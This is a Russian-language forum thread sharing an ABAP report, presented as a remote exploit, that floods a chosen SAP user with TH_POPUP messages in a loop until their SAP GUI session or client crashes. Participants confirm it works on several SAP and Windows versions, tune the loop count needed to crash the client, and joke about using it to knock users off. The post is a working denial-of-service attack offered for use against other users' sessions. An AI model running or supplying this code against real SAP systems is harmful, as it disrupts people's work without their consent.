Remote ABAP Exploit для SAP GUI

holocron

не помню, публиковал или нет, но вот сей код вышибает режим у пользователя без предупреждений

проверено на 4.6с + GUI up to 6.20. Иногда атакуемая машинка пищит

Code:

report z_gui_exploit.

parameters uname type sy-uname obligatory.
parameters text type sm04dic-popupmsg.
parameters times type i default 50.
parameters mandt type sy-mandt default sy-mandt.

start-of-selection.
  do times times.
  call function 'TH_POPUP'
    exporting
      client = mandt
      user = uname
      message = text
    exceptions                                                              
      user_not_found = 1
      others = 2.
  enddo.

ArmAnn

клево

4.0b вылетает так же без вопросов

опаньки... попробовал на себе - вылетает даже не режим, а весь сапгуй падает, успев показать какое то окошко и тут же его закрыв :shock:

RoadRunner

Выполнять прогу можно в интерактивном режиме? С какими параметрами? У меня гуя не падает...

Версия 6.40 патч 11 (или 13).

ArmAnn

RoadRunner написал:

Выполнять прогу можно в интерактивном режиме? С какими параметрами? У меня гуя не падает...

Версия 6.40 патч 11 (или 13).

из параметров я ввожу только имя пользователя (свое), версия гуя 6.20

ЗЫ. винда 2к

Alexeyslav

Да, падает, видимо из-за нехватки ресурсов! Наверняка падает только в 9x винде которая страдает такой проблемой.
по крайней мере проверял с times = 50 - закрывается, а если поставить 20 то не падает, и соответственно выдает 20 окошек ....

Sergo

Цитата:

Да, падает, видимо из-за нехватки ресурсов! Наверняка падает только в 9x винде которая страдает такой проблемой.

На XP тоже падает. При 50.

При 10 не падает.
Точное число не стал искать.

Skif

holocron написал(а):

не помню, публиковал или нет, но вот сей код вышибает режим у пользователя без предупреждений

проверено на 4.6с + GUI up to 6.20. Иногда атакуемая машинка пищит

Весёлая фуська - вставлю в "Палаш" - гасить пачкой особо рьяных юзеров при системных работах

.

vvvictor

holocron написал(а):

не помню, публиковал или нет, но вот сей код вышибает режим у пользователя без предупреждений

проверено на 4.6с + GUI up to 6.20. Иногда атакуемая машинка пищит

Злые вы....... Все-бы юзверю нагадить :twisted:

vvvictor

Skif написал:

Весёлая фуська - вставлю в "Палаш" - гасить пачкой особо рьяных юзеров при системных работах

.

А нафига ? Могу поделиться своей прогой - отмечаешь кого и на какой период гасить и все....... В нужное время выкинет, заблокирует, а потом разблокирует :-)

ArmAnn

vvvictor написал:

Могу поделиться своей прогой - отмечаешь кого и на какой период гасить и все....... В нужное время выкинет, заблокирует, а потом разблокирует :-)

и этот человек кого то назвал злым :lol:

vvvictor

ArmAnn написал:

и этот человек кого то назвал злым :lol:

Сравни один TH_POPUP с предупреждением об отключении с возможностью завершить корректно работу и т.д. А потом просто блокирование все "нежелательных" на время системных работ с последующим автоматическим разблокированием и чистой воды флуд, пока ГУЙ не загнется

Необходимость таких мер я признаю, но вот по поводу инструментария готов поспорить :lol:

Гость

vvvictor написал:

Skif написал:

Весёлая фуська - вставлю в "Палаш" - гасить пачкой особо рьяных юзеров при системных работах

.

А нафига ? Могу поделиться своей прогой - отмечаешь кого и на какой период гасить и все....... В нужное время выкинет, заблокирует, а потом разблокирует :-)

да заблокирует ..это есть уже...вот выкинет, чтоб не долбать сообщениями и через sm04 не колбасится

vvvictor

Anonymous написал(а):

vvvictor написал:

Skif написал:

Весёлая фуська - вставлю в "Палаш" - гасить пачкой особо рьяных юзеров при системных работах

.

А нафига ? Могу поделиться своей прогой - отмечаешь кого и на какой период гасить и все....... В нужное время выкинет, заблокирует, а потом разблокирует :-)

да заблокирует ..это есть уже...вот выкинет, чтоб не долбать сообщениями и через sm04 не колбасится

Я это года два-три назад ваял - если память не изменяет - и выкидывает.....

Гость

Anonymous написал(а):

vvvictor написал:

Skif написал:

Весёлая фуська - вставлю в "Палаш" - гасить пачкой особо рьяных юзеров при системных работах

.

А нафига ? Могу поделиться своей прогой - отмечаешь кого и на какой период гасить и все....... В нужное время выкинет, заблокирует, а потом разблокирует :-)

да заблокирует ..это есть уже...вот выкинет, чтоб не долбать сообщениями и через sm04 не колбасится

погодь..она ж только в текущей инстанции будет пахать? или торможу?

vvvictor

Anonymous написал(а):

погодь..она ж только в текущей инстанции будет пахать? или торможу?

Не помню, но некоторые вещи можно вырулить, например с client specify, если ты речь ведешь про мандант

Правила форума

Remote ABAP Exploit для SAP GUI

Кто сейчас на конференции